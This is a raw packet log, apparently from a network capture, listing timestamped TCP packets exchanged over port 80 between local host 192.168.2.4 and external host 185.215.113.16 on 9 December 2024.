Dec 9, 2024 08:08:16.509136915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.509190083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.510607958 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.510658026 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.510693073 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.510735989 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.512285948 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.512334108 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.512363911 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.512480974 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.513950109 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.513998032 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.514040947 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.514089108 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.515634060 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.515687943 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.515753031 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.515795946 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.517750025 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.517807007 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.517873049 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.517976999 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.519155979 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.519205093 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.519273996 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.519323111 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.520591021 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.520652056 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.520688057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.520725965 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.522272110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.522384882 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.522387028 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.522425890 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.523987055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.524032116 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.524131060 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.524180889 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.525631905 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.525727987 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.525763988 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.525825977 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.527273893 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.527338028 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.527395964 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.527445078 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.528904915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.528956890 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.529019117 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.529082060 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.530623913 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.530674934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.530715942 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.530755997 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.532270908 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.532316923 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.532377005 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.532422066 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.533997059 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.534056902 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.534079075 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.534106016 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.535718918 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.535772085 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.535801888 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.535840988 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.636054993 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.636142969 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.636182070 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.636229992 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.636833906 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.636892080 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.636964083 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.637013912 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.638236046 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.638288021 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.638359070 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.638401031 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.639698982 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.639801979 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.639803886 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.639842987 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.641199112 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.641248941 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.641258001 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.641283035 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.642612934 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.642667055 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.642703056 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.642785072 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.644016981 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.644066095 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.644103050 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.644140959 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.653281927 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.653331995 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.653399944 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.653441906 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.653934956 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.653986931 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.654042006 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.654161930 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.655260086 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.655318022 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.655388117 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.655492067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.656496048 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.656557083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.656618118 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.656658888 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.657808065 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.657852888 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.657905102 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.657952070 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.659071922 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.659121037 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.659154892 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.659204960 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.660316944 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.660363913 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.660413980 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.660510063 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.661598921 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.661643982 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.661717892 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.661787033 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.662931919 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.662942886 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.662972927 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.662992954 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.664159060 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.664205074 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.664205074 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.664246082 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.665741920 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.665752888 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.665787935 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.665798903 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.666688919 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.666732073 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.666781902 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.666821003 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.667889118 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.667929888 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.667990923 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.668035030 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.669157982 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.669209957 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.669272900 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.669404030 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.670476913 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.670528889 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.670567989 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.670618057 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.671680927 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.671725988 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.671787024 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.672049999 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.673032999 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.673044920 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.673084021 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.674222946 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.674267054 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.674288988 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.675463915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.675506115 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.675565958 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.676039934 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.676737070 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.676913977 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.676951885 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.678142071 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.678194046 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.678236961 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.679229021 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.679272890 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.679295063 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.679497004 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.680533886 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.680579901 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.680634975 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.680670977 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.681775093 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.681821108 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.681945086 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.682136059 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.683083057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.683171034 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.683187962 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.683207035 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.684319973 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.684422016 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.684426069 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.684705019 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.685573101 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.685630083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.685692072 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.685781002 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.686940908 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.686990976 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.687045097 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.687161922 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.688141108 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.688189030 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.688236952 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.688283920 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.689352036 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.689399958 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.689456940 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.689496994 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.690675974 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.690730095 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.690804958 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.690994978 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.691880941 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.692048073 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.692105055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.692167044 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.693140030 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.693190098 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.693232059 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.693281889 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.694562912 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.694619894 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.694654942 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.694747925 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.695693970 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.695741892 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.695801020 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.695921898 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.697000027 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.697128057 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.697170019 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.698195934 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.698251963 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.698287964 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.698329926 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.699475050 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.699527025 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.699562073 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.699678898 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.700710058 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.700769901 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.700825930 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.700871944 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.702070951 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.702126026 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.702143908 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.702208996 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.703452110 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.703500032 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.703509092 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.703560114 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.704500914 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.704554081 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.704596996 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.704642057 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.705786943 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.705836058 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.705907106 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.705944061 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.707056046 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.707107067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.707150936 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.707252979 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.708348036 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.708401918 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.708461046 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.708547115 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.709635973 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.709692955 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.709726095 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.710056067 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.710856915 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.710908890 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.828284025 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.828349113 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.828388929 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.828516960 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.828926086 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.829010010 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.829046965 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.829088926 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.830058098 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.830108881 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.830190897 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.830235958 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.831211090 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.831270933 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.831295013 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.831350088 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.832375050 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.832431078 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.832514048 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.832566023 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.833522081 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.833581924 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.833635092 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.833787918 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.834696054 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.834749937 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.834860086 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.834918022 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.845766068 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.845815897 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.845856905 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.845911026 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.846266031 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.846309900 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.846394062 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.846436977 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.847460032 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.847517014 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.847681999 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.847971916 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.848547935 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.848594904 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.848673105 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.848716021 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.849730015 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.849875927 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.849898100 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.849910021 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.850847006 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.850974083 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.851011038 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.851056099 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.851957083 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.852003098 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.852075100 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.852287054 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.853130102 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.853182077 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.853308916 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.853360891 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.854289055 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.854340076 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.854401112 CET	80	49783	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:16.854451895 CET	49783	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:16.855426073 CET	80	49783	185.215.113.16	192.168.2.4
